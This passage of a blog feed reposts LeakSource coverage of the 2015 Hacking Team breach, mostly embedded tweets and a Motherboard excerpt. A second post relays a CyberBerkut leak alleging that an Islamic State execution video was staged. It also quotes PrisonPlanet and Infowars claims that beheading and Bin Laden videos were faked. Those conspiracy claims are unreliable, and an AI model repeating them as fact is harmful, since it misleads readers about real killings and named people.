In another [e-mail], the Hacking Team CEO on 15 May claimed renowned cryptographer Bruce Schneier was “exploiting the Big Brother is Watching You FUD (Fear, Uncertainty and Doubt) phenomenon in order to sell his books, write quite self-promoting essays, give interviews, do consulting etc. and earn his hefty money.”</blockquote>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Ex-Hacking Team employee developed counter surveillance software thatcould detect HT. HT not very happy.
<a href="https://t.co/ou2eLnrZe6">https://t.co/ou2eLnrZe6</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/618122379047378945">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
trying to stop me from leaving HT, the CEO asked the help of Italian Gov to harass and threaten me <a href="https://t.co/s2cbuGoE1D">https://t.co/s2cbuGoE1D</a></div>
— Guido Landi (@k_sOSe) <a href="https://twitter.com/k_sOSe/status/619174572668100612">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
wow. the attackers were in hackingteams infrastructure since january 2015. <a href="https://t.co/8HhoWdrdpv">https://t.co/8HhoWdrdpv</a>
Lots of youtube/games during working hrs</div>
— Dan Tentler (@Viss) <a href="https://twitter.com/Viss/status/618153223862423552">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Holee crap. This appears to be intercepted audio from <a href="https://twitter.com/hashtag/hackingteam?src=hash">#hackingteam</a> targets. <a href="https://t.co/cITQAYFo8j">https://t.co/cITQAYFo8j</a></div>
— Paul D (@Paulmd199) <a href="https://twitter.com/Paulmd199/status/618139742941491201">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Not just audio. But also some smartphone videos. <a href="https://t.co/cITQAYFo8j">https://t.co/cITQAYFo8j</a></div>
— Paul D (@Paulmd199) <a href="https://twitter.com/Paulmd199/status/618142296593186816">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
ALL HIS PASSWORDS ARE PASSWORD.
This is *DEFINITELY* "good enough for government work". Hooooly craaaaap <a href="http://t.co/eshIurqky2">pic.twitter.com/eshIurqky2</a></div>
— Dan Tentler (@Viss) <a href="https://twitter.com/Viss/status/617950211239837696">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Here's the TLS secret key for <a href="http://t.co/O96KnDR2o0">http://t.co/O96KnDR2o0</a> <a href="https://twitter.com/hashtag/hackingteam?src=hash">#hackingteam</a> <a href="http://t.co/8BhNiKG3Ub">pic.twitter.com/8BhNiKG3Ub</a></div>
— Micah Lee (@micahflee) <a href="https://twitter.com/micahflee/status/618166439820685312">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
We all got access to C. Pozzi's GPG key! <a href="https://t.co/OUitG4eaJ2">https://t.co/OUitG4eaJ2</a> <a href="https://twitter.com/hashtag/hackedteam?src=hash">#hackedteam</a></div>
— Jurre van Bergen (@DrWhax) <a href="https://twitter.com/DrWhax/status/618034229407023104">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Some say that infosec credentials are worthless. Not always. Photoshop in your name and become a Hacking Team expert. <a href="http://t.co/f3xYtFp4zk">pic.twitter.com/f3xYtFp4zk</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/618090082155761664">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Making millions selling surveillance software, but still pirating security research tools? Classy. (h/t <a href="https://twitter.com/sb101sb">@sb101sb</a>) <a href="http://t.co/Cl8GeBpJD9">pic.twitter.com/Cl8GeBpJD9</a></div>
— Christopher Soghoian (@csoghoian) <a href="https://twitter.com/csoghoian/status/618041812108857344">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Despite <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a>'s poor opsec, CEO came from early days of PGP <a href="http://t.co/FiL7zhEx0x">http://t.co/FiL7zhEx0x</a> cc <a href="https://twitter.com/csoghoian">@csoghoian</a> <a href="https://twitter.com/onthemedia">@onthemedia</a> <a href="https://twitter.com/lorenzoFB">@lorenzoFB</a></div>
— Cyrus Farivar (@cfarivar) <a href="https://twitter.com/cfarivar/status/618813698023424001">July 8, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<a href="https://twitter.com/lorenzofb" target="_blank">Lorenzo Franceschi-Bicchierai</a>/<a href="http://motherboard.vice.com/read/hacking-team-asks-customers-to-stop-using-its-software-after-hack" target="_blank">Motherboard</a>:<br />
After suffering a massive hack, the controversial surveillance tech company Hacking Team is scrambling to limit the damage as well as trying to figure out exactly how the attackers hacked their systems.<br />
But the hack hasn’t just ruined the day for Hacking Team’s employees. The company has told all its customers to shut down all operations and suspend all use of the company’s spyware, Motherboard has learned.<br />
“They’re in full on emergency mode,” a source who has inside knowledge of Hacking Team’s operations told Motherboard.<br />
Hacking Team notified all its customers on Monday morning with a “blast email,” requesting them to shut down all deployments of its Remote Control System software, also known as Galileo, according to multiple sources. The company also doesn’t have access to its email system as of Monday afternoon, a source said.<br />
A source told Motherboard that the hackers appears to have gotten “everything,” likely more than what the hacker has posted online, perhaps more than one terabyte of data.<br />
It’s unclear how the hackers got their hands on the stash, but judging from the leaked files, they broke into the computers of Hacking Team’s two systems administrators, Christian Pozzi and Mauro Romeo, who had access to all the company’s files, according to the source.<br />
In a <span style="text-decoration: underline;"><a href="https://archive.is/Ca8Kz" target="_blank">series of tweets</a></span> on Monday morning, which have been since deleted, Pozzi said that Hacking Team was working closely with the police, and warned everyone who was downloading the files and commenting on them.<br />
“Be warned that the torrent file the attackers claim is clean has a virus,” he wrote. “Stop seeding and spreading false info.”<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Accurate. <a href="http://t.co/NgntYctdcV">pic.twitter.com/NgntYctdcV</a></div>
— Matthew Green (@matthew_d_green) <a href="https://twitter.com/matthew_d_green/status/617982986303205376">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
<a href="https://twitter.com/0xabad1dea">@0xabad1dea</a> <a href="https://twitter.com/matthew_d_green">@matthew_d_green</a> but, epic lulz happened first: <a href="http://t.co/SFrDCKpexZ">pic.twitter.com/SFrDCKpexZ</a></div>
— Andreⓐ (@puellavulnerata) <a href="https://twitter.com/puellavulnerata/status/618094012143153153">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
The future of the company, at this point, it’s uncertain.<br />
Employees fear this might be the beginning of the end, according to sources. One current employee, for example, started working on his resume, a source told Motherboard.<br />
It’s also unclear how customers will react to this, but a source said that it’s likely that customers from countries such as the US will pull the plug on their contracts.<br />
Hacking Team asked its customers to shut down operations, but according to one of the leaked files, as part of Hacking Team’s “crisis procedure,” it could have killed their operations remotely.<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Well, <a href="https://twitter.com/hackingteam">@hackingteam</a> can start following its "crisis procedure" any minute now. Perhaps when they wake up. <a href="http://t.co/HPVSEG8vex">pic.twitter.com/HPVSEG8vex</a></div>
— Eva (@evacide) <a href="https://twitter.com/evacide/status/617951954308718593">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
The company, in fact, has “a backdoor” into every customer’s software, giving it ability to suspend it or shut it down—something that even customers aren’t told about.<br />
To make matters worse, every copy of Hacking Team’s Galileo software is watermarked, according to the source, which means Hacking Team, and now everyone with access to this data dump, can find out who operates it and who they’re targeting with it.<br />
Hacking Team did not answer to repeated requests for comment, both to its US spokesperson Eric Rabe as well as directly to its office in Milan, Italy.<br />
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team: “Data leak shows we have broken no laws and acted completely ethically” <a href="http://t.co/EPQhS73Vlf">http://t.co/EPQhS73Vlf</a> cc <a href="https://twitter.com/YourAnonNews">@YourAnonNews</a> <a href="https://twitter.com/csoghoian">@csoghoian</a></div>
— David Gilbert (@daithaigilbert) <a href="https://twitter.com/daithaigilbert/status/618429810369560576">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<blockquote>
When asked about the identity of the person or group who carried out the attack, Rabe indicated that he believed the attack was the work of a nation state or a criminal gang, and not <span style="text-decoration: underline;"><a href="http://www.ibtimes.co.uk/who-hacked-hacking-team-gamma-group-hacker-holds-their-hand-1509662" target="_blank" title="Who hacked Hacking Team? Gamma Group hacker holds their hand up">the work of an activist as many have speculated</a></span>:</blockquote>
<blockquote class="block1">
“Doing our own forensics here, we think this was a very sophisticated attack, and certainly not the work of an amateur. The press seems to take the view that this was some sort of human rights activist but I think that is far from certain and it could easily have been criminal activity or some government activity,” adding that “this is almost certainly an international crime”.</blockquote>
<blockquote>
When it was pointed out that if a government or criminal group was behind the attack then posting all the information online seems a strange move, Rabe said: “I am not sure why anybody would do that, but part of the effort here was to disrupt our operations as much as possible so I think that would be a motive for many different people.”<br />
When asked if this could be the work of one of Hacking Team’s competitors such as UK-based Gamma International or Israeli NSO Group, Rabe said: “I think that is unlikely” though he admitted that just like everyone else he was speculating.<br />
While some media reports have suggested the company is working with the Italian police to investigate the attack, Rabe says that all he will say is that the company is “working with law enforcement” reiterating that this was an international attack.</blockquote>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Days after <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a> breach, nobody fired, no customers lost <a href="http://t.co/xFaWipaNUG">http://t.co/xFaWipaNUG</a> cc <a href="https://twitter.com/doctorow">@doctorow</a> <a href="https://twitter.com/ioerror">@ioerror</a> <a href="https://twitter.com/csoghoian">@csoghoian</a> <a href="https://twitter.com/onthemedia">@onthemedia</a></div>
— Cyrus Farivar (@cfarivar) <a href="https://twitter.com/cfarivar/status/618695355719221248">July 8, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
It has been a busy few days! But we are posting updates on this feed and at <a href="http://t.co/wmgPz9IX8R">http://t.co/wmgPz9IX8R</a></div>
— HackingTeam (@hackingteam) <a href="https://twitter.com/hackingteam/status/618843399924371456">July 8, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Hacking Team says "terrorists" can now use its leaked spyware, but experts are skeptical of the company's claims. <a href="http://t.co/KZbL5plQyZ">http://t.co/KZbL5plQyZ</a></div>
— Lorenzo Franceschi B (@lorenzoFB) <a href="https://twitter.com/lorenzoFB/status/618826121338089472">July 8, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
I asked Hacking Team’s spokesperson if they were working with companies to patch 0days. Here’s what he said – <a href="http://t.co/hsNFbxABt8">http://t.co/hsNFbxABt8</a></div>
— Matthew Keys (@MatthewKeysLive) <a href="https://twitter.com/MatthewKeysLive/status/619227088390877184">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
I'll writeup how hacking team got hacked once they've had some time to fail at figuring out what happened and go out of business</div>
— Phineas Fisher (@GammaGroupPR) <a href="https://twitter.com/GammaGroupPR/status/618250515198181376">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
<a href="https://twitter.com/lorenzoFB">@lorenzofb</a> I wonder did <a href="https://twitter.com/GammaGroupPR">@GammaGroupPR</a> use the same approach? Cant wait to see the write up. <a href="http://t.co/1SNygZO7N1">http://t.co/1SNygZO7N1</a></div>
— Richard Tynan (@richietynan) <a href="https://twitter.com/richietynan/status/618072177838030848">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
<a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a> CEO links to LeakSource post on NSA hacking tools catalog in <a href="https://twitter.com/hashtag/HackedTeam?src=hash">#HackedTeam</a> emails. <a href="https://t.co/p9515j44Xo">https://t.co/p9515j44Xo</a> <a href="http://t.co/qcN0ALjA6I">pic.twitter.com/qcN0ALjA6I</a></div>
— LeakSource (@LeakSourceInfo) <a href="https://twitter.com/LeakSourceInfo/status/619228721204043776">July 9, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Correction: they might not be a client, I don't see them in the documents. Might just be some pro-Hacking Team people.</div>
— Mustafa Al-Bassam (@musalbas) <a href="https://twitter.com/musalbas/status/618181893364805632">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Mozilla security promises bug bounty to the first person to file bugs for any vulnerabilities from <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a>: <a href="https://t.co/z3Xw9EMGfZ">https://t.co/z3Xw9EMGfZ</a></div>
— Runa A. Sandvik (@runasand) <a href="https://twitter.com/runasand/status/618042368898531328">July 6, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
Italy Should Investigate <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a>, European Parliament Member Says <a href="http://t.co/IS2gQXizho">http://t.co/IS2gQXizho</a></div>
— Marietje Schaake (@MarietjeSchaake) <a href="https://twitter.com/MarietjeSchaake/status/618496766955102208">July 7, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<div class="embed-twitter">
<blockquote class="twitter-tweet" width="550">
<div dir="ltr" lang="en">
unless i missed it, <a href="https://twitter.com/nytimes">@nytimes</a> hasn't independently addressed <a href="https://twitter.com/hashtag/HackingTeam?src=hash">#HackingTeam</a> hack. major story on surveillance industry. why no coverage?</div>
— David Kaye (@davidakaye) <a href="https://twitter.com/davidakaye/status/618824223339884544">July 8, 2015</a></blockquote>
<script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script></div>
——————————————————————————————————————————————————————————————————-<br />
<em>*This post will be continuously updated as there is much more new information emerging. Post anything you find in the comments below and I will add them to the article. LAST UPDATE: 07/09/2015 @ 5PM EST<br />
</em><br />
——————————————————————————————————————————————————————————————————-<br />
<em>Related Links:</em><br />
<em><a class="row-title" href="http://leaksource.info/2013/12/30/to-protect-and-infect-the-militarization-of-the-internet-claudio-guarnieri-morgan-marquis-boire-jacob-appelbaum-30c3/" target="_blank" title="Edit “To Protect and Infect: The Militarization of the Internet – Claudio Guarnieri, Morgan Marquis-Boire, Jacob Appelbaum @ 30c3”">To Protect and Infect: The Militarization of the Internet – Claudio Guarnieri, Morgan Marquis-Boire, Jacob Appelbaum @ 30c3</a></em><br />
<div class="title">
<em><a href="https://firstlook.org/theintercept/2014/10/30/hacking-team/" target="_blank">Secret Manuals Show the Spyware Sold to Despots and Cops Worldwide</a></em></div>
<div class="title">
<br /></div>
<div class="title">
http://leaksource.info/2015/07/07/hacking-team-hacked-400gb-data-dump-of-internal-documents-emails-source-code-from-notorious-spyware-dealer/</div>
</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2615012028595202594.post-38520171107539684702015-07-13T11:46:00.001+02:002015-07-13T11:46:50.860+02:00Leaked Video Shows Making of Islamic State “Execution” in Studio — via CyberBerkut Hack of Sen. McCain Staffer<div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
Leaked Video Shows Making of Islamic State “Execution” in Studio — via CyberBerkut Hack of Sen. McCain Staffer</h2>
<small> on <strong>July 12, 2015</strong> at <strong>2:56 PM</strong></small>
<br />
<div class="entry">
<a href="https://leaksource.files.wordpress.com/2015/07/islamic-state-studio.png"><img alt="islamic-state-studio" class="aligncenter wp-image-28555" height="308" src="https://leaksource.files.wordpress.com/2015/07/islamic-state-studio.png?w=550&h=308" width="550" /></a><br />
<em>07/11/2015</em><br />
<a href="https://translate.google.ca/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fwww.cyber-berkut.ru%2Fmain%2F20150710_00.php&edit-text=&act=url" target="_blank">CyberBerkut</a> (Google Translation):<br />
<blockquote>
<span class="notranslate">We CyberBerkut received at the disposal of the file whose value can not be overstated!</span><br />
<span class="notranslate">Dear <a href="https://twitter.com/SenJohnMcCain">Senator McCain</a>!</span> <span class="notranslate"> We recommend you next time in foreign travel, and especially on the territory of Ukraine, not to take confidential documents.</span><br />
<span class="notranslate">On one of the devices of your colleagues, we found a lot of interesting things.</span> <span class="notranslate"> Something we decided to put: this video should become the property of the international community!</span></blockquote>
——————————————————————————————————————————————————————————————————-<br />
The 3 <span class="st">½</span> minute silent video appears to show infamous Islamic State executioner <a href="http://leaksource.info/2015/02/26/islamic-states-jihadi-john-identified-as-mohammed-emwazi-from-london-26-year-old-well-off-westminster-grad-alleged-mi5-recruit-attempt-in-2009/" target="_blank">Jihadi John (aka Mohammed Emwazi)</a>
in front of a giant green screen, standing beside a kneeling hostage
wearing an orange jumpsuit and a green screen hood. They are inside a
lit studio with a production crew and can be seen rehearsing an
“execution”. The desert scene of the set, complete with wind machine,
are similar to that shown in the beheading videos of <a href="http://leaksource.info/2014/08/19/graphic-video-islamic-state-beheads-american-journalist-james-foley/" target="_blank">James Foley</a>, <a href="http://leaksource.info/2014/09/02/graphic-video-islamic-state-beheads-american-journalist-steven-sotloff/" target="_blank">Steven Sotloff</a>, <a href="http://leaksource.info/2014/09/13/graphic-video-islamic-state-beheads-british-aid-worker-david-haines/" target="_blank">David Haines</a>, and <a href="http://leaksource.info/2014/10/03/graphic-video-islamic-state-beheads-british-aid-worker-alan-henning/" target="_blank">Alan Henning</a>.<br />
<br />
x<br />
<iframe allowfullscreen="" frameborder="0" height="452" src="//videopress.com/embed/DVmHJVfr?hd=0&autoplay=0&permalink=1&loop=0" width="604"></iframe><script src="http://s0.wp.com/wp-content/plugins/video/assets/js/next/videopress-iframe.js?m=1435166243"></script>
——————————————————————————————————————————————————————————————————-<br />
Here is an example someone put together showing the similarities
between the leaked studio video and the Foley beheading video. Though
they are not identical, it gives a good comparison:<br />
<a href="https://leaksource.files.wordpress.com/2015/07/islamic-state-studio-foley-comparison.gif"><img alt="islamic-state-studio-foley-comparison" class="aligncenter size-full wp-image-28569" src="https://leaksource.files.wordpress.com/2015/07/islamic-state-studio-foley-comparison.gif?w=604" /></a><br />
——————————————————————————————————————————————————————————————————-<br />
British forensic experts <a href="http://www.telegraph.co.uk/journalists/bill-gardner/11054488/Foley-murder-video-may-have-been-staged.html" target="_blank">concluded that the James Foley video was likely staged</a> using “camera trickery and slick post-production techniques.”<br />
<br />
Terrorism research expert <a href="http://www.trackingterrorism.org/profile/veryan-khan" target="_blank">Veryan Khan</a> <span style="text-decoration: underline;"><a href="http://nypost.com/2015/01/23/was-the-new-isis-hostage-video-shot-indoors/" target="_blank">said</a></span> the <a href="http://leaksource.info/2015/01/20/islamic-states-jihadi-john-in-new-hostage-video-demands-200-million-ransom-for-2-japanese-citizens-within-72-hours/" target="_blank">video</a> of Japanese hostages Kenji Goto and Haruna Yukawa was likely completed in an indoor studio with a false backdrop.<br />
<br />
Hollywood horror film director <a href="https://en.wikipedia.org/wiki/Mary_Lambert" target="_blank">Mary Lambert</a> <a href="http://www.foxnews.com/world/2015/02/21/isis-army-7-footers-experts-say-video-copt-beheadings-manipulated/" target="_blank">said</a> of the Islamic State <a href="https://vimeo.com/119705104" target="_blank">video</a>
showing the killing of 21 Egyptian Coptic Christians on a Libyan beach,
that “in the opening shot all the figures might be animated. They never
had more than six men on the beach … The close-ups of jihadists on the
beach are most likely green screen … The sea turning red is obviously
FX.”<br />
<br />
Journalist <a href="https://twitter.com/ThomasWictor" target="_blank">Thomas Wictor</a> has <a href="http://www.thomaswictor.com/the-jordanian-pilot-was-not-burned-alive/" target="_blank">claimed</a> that the Islamic State <a href="http://leaksource.info/2015/02/04/jordanian-pilot-kaseasbeh-burned-alive-by-islamic-state-jordan-executes-is-requested-prisoner-rishawi-in-response/" target="_blank">video</a> showing Jordanian pilot <span id="articleText">Mu’ath al-Kaseasbeh</span> burned alive was actually fake, pointing to evidence of CGI flames and video glitches.<br />
——————————————————————————————————————————————————————————————————-<br />
LeakSource cannot confirm the video’s authenticity. If it’s a hoax,
it’s a pretty elaborate one. Is it legit? If so, was it done by an
Islamic State production crew (unlikely with a <a href="https://leaksource.files.wordpress.com/2015/07/islamic-state-studio-woman.jpg" target="_blank">female PA on set</a>) , or someone else (ie. intelligence agency). And why was it found on a device of Senator John McCain’s staffer?<br />
——————————————————————————————————————————————————————————————————-<br />
Steve Watson/<a href="http://www.prisonplanet.com/former-cia-officials-admit-to-faking-bin-laden-video.html" target="_blank">PrisonPlanet</a> (05/25/2010) & <a href="https://twitter.com/MikaelThalen" target="_blank">Mikael Thalen</a>/<a href="http://www.infowars.com/flashback-cia-admits-to-staging-fake-jihadist-videos/" target="_blank">Infowars</a> (09/03/2014):<br />
A 2010 Washington Post <a href="http://voices.washingtonpost.com/spy-talk/2010/05/cia_group_had_wacky_ideas_to_d.html" target="_blank">article</a>
authored by former Army Intelligence Officer Jeff Stein features a
detailed account of how the CIA admittedly filmed a fake Bin Laden video
during the run up to the 2003 Iraq war.<br />
<br />
The article, which includes comments from multiple sources within the
CIA’s Iraq Operations Group, explains how the agency had planned to
“flood Iraq with the videos” depicting several controversial scenarios.<br />
<br />
“The agency actually did make a video purporting to show Osama bin
Laden and his cronies sitting around a campfire swigging bottles of
liquor and savoring their conquests with boys, one of the former CIA
officers recalled, chuckling at the memory,” the article states. “The
actors were drawn from ‘some of us darker-skinned employees.’”<br />
<br />
Other CIA officials admitted to planning several fake videos
featuring former Iraqi President Saddam Hussein, one of which would
depict the leader engaged in sexual acts with a teenage boy.<br />
“It would look like it was taken by a hidden camera,” said one of the
former officials. “Very grainy, like it was a secret videotaping of a
sex session.”<br />
<br />
Another idea was to interrupt Iraqi television programming with a
fake special news bulletin. An actor playing Hussein would announce that
he was stepping down in favor of his (much-reviled) son Uday.<br />
<br />
“I’m sure you will throw your support behind His Excellency Uday,” the fake Hussein would intone.<br />
According to one official, the video ideas were eventually scrapped
due to the CIA officers, who spent their careers in Latin America and
East Asia, not understanding “the cultural nuances of the region.”<br />
<br />
The former officials told Stein that the project was taken over by the military after it ground to a halt:<br />
The reality, the former officials said, was that the agency really
didn’t have enough money and expertise to carry out the projects.<br />
<br />
“The military took them over,” said one. “They had assets in psy-war down at Ft. Bragg,” at the army’s special warfare center.<br />
<br />
This latest revelation bolsters evidence that the intelligence
agencies, and perhaps more significantly, the military have been engaged
in creating fake Bin Laden videos in the past.<br />
As we have <span style="text-decoration: underline;"><a href="http://infowars.net/articles/October2006/051006Rumsfeld.htm" target="_blank">exhaustively documented</a></span>,
Intelcenter, the U.S. monitoring group that routinely releases Bin
Laden video and audio, much of which have been proven to be either <span style="text-decoration: underline;"><a href="http://www.prisonplanet.com/120903binladentape.htm" target="_blank">rehashed old footage</a></span> or <a href="http://www.prisonplanet.com/bin_laden_tape_a_fake_swiss_lab_says.htm" target="_blank">outright fakes</a>, is an offshoot of IDEFENSE, a web security company that monitors intelligence from the middle east.<br />
<br />
IDEFENSE is heavily populated by long serving ex military
intelligence officials, such as senior military psy-op intelligence
officer Jim Melnick, who served 16 years in the US army and the Defense
Intelligence Agency (DIA) in psychological operations. Melnick has also
worked directly for former Defense Secretary Donald Rumsfeld.<br />
<br />
Intelcenter notoriously <span style="text-decoration: underline;"><a href="http://www.prisonplanet.com/articles/october2006/051006redhanded.htm" target="_blank">released the “laughing hijackers” tape</a></span>
and claimed it was an Al-Qaeda video, despite the fact that the footage
was obtained by a “security agency” at a 2000 Bin Laden speech.<br />
<span style="text-decoration: underline;"><a href="http://www.prisonplanet.com/articles/august2007/020807tapesdoctored.htm" target="_blank">IntelCenter was also caught adding its logo</a></span>
to a tape at the same time as Al-Qaeda’s so-called media arm As-Sahab
added its logo, proving the two organizations were one and the same.<br />
<br />
Could the CIA group of “dark skinned actors” have been behind the infamous December 2001 <span style="text-decoration: underline;"><a href="http://infowars.net/articles/february2007/190207Osama_tape.htm" target="_blank">“Fat nosed” Bin Laden video</a></span>, that was magically <span style="text-decoration: underline;"><a href="http://www.prisonplanet.com/articles/january2006/found%20in%20a%20house%20in%20Jalalabad%20after%20anti-Taliban%20forces%20moved%20in." target="_blank">found in a house</a></span> in Jalalabad after anti-Taliban forces moved in?<br />
<br />
The tape featured a fat Osama laughing and joking about how he’d carried out 9/11. The video was also <span style="text-decoration: underline;"><a href="http://dc.indymedia.org/newswire/display/16801" target="_blank">mistranslated</a></span>
in order to manipulate viewer opinion and featured “Bin Laden” praising
two of the hijackers, only he got their names wrong. This Osama also
used the wrong hand to write with and wore gold rings, a practice
totally in opposition to the Muslim faith.<br />
<br />
Despite the fact that the man in the video looks nothing like Bin
Laden, the CIA stood by it and declared it to be the official “9/11
confession video”.<br />
<br />
The latest revelations also shed light on another past Bin Laden release – a tape in which he ludicrously <span style="text-decoration: underline;"><a href="http://www.prisonplanet.com/another_dubious_bin_laden_tape_comes_when_the_us_needed_it_the_most.htm" target="_blank">declared himself in league with Saddam Hussein</a></span> in the weeks before the invasion of Iraq.<br />
The notion that the CIA project was taken over and drastically
improved by the Pentagon at some point after 2003 jives with the
improvement in quality of Bin Laden videos in later years. Most notably
the video that was released immediately <span style="text-decoration: underline;"><a href="http://www.prisonplanet.com/articles/february2006/280206binladenshelp.htm" target="_blank">ahead of the 2004 election</a></span>, and it’s digitally manipulated <span style="text-decoration: underline;"><a href="http://infowars.net/articles/september2007/100907BinLaden.htm" target="_blank">duplicate from 2007</a></span>, in which Bin Laden appeared to have a dyed beard.<br />
——————————————————————————————————————————————————————————————————-<br />
John McCain’s <a href="http://news.yahoo.com/us-senator-mccain-slams-european-stance-ukraine-172844262.html" target="_blank">last</a> <a href="http://www.washingtonpost.com/posttv/national/mccain-calls-for-arms-for-ukraine/2015/06/20/4f9e7a20-176a-11e5-8457-4b431bf7ed4c_video.html" target="_blank">visit</a> to Ukraine was June 19th, 2015. If this is when the hack occurred is unclear. He was also <a href="https://twitter.com/SenJohnMcCain/status/611988255307919361" target="_blank">accompanied</a> by Senators <a href="https://twitter.com/SenTomCotton" target="_blank">Tom Cotton</a> and <a href="https://twitter.com/SenJohnBarrasso" target="_blank">John Barrasso</a>.
They were welcomed by U.S. Ambassador to Ukraine Geoffrey Pyatt, and
met with senior Ukrainian officials, including President Petro
